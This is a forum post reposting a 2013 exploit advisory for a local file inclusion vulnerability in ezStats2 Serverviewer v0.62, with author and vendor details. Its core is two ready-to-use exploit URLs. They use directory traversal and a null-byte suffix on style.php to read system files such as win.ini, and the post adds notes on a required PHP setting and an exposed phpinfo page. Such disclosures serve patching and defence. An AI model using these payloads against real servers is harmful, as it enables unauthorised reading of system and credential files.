Praetorian503 Posted February 6, 2013 Report Share Posted February 6, 2013 ezStats2 Serverviewer version 0.62 suffers from a local file inclusion vulnerability.#################################################### Exploit Title: ezStats2 Serverviewer v0.62 Local File Inclusion Vulnerability### Date: 02/05/2013### Author: L0n3ly-H34rT### Contact: l0n3ly_h34rt@hotmail.com### My Site: http://se3c.blogspot.com/### Vendor Link: http://www.ezstats.org/### Software Link: http://ezstats.googlecode.com/files/ezStats2_Serverviewer_v0.62.zip### Tested on: Linux/Windows #################################################http://127.0.0.1/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpghttp://127.0.0.1/ezServer/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg############################################# Notes :1- Must be magic_quotes_gpc = Off2- phpinfo() :http://127.0.0.1/ezServer/admin/apitest.php?info# Greetz to my friendzSource: PacketStorm Quote Link to comment Share on other sites More sharing options...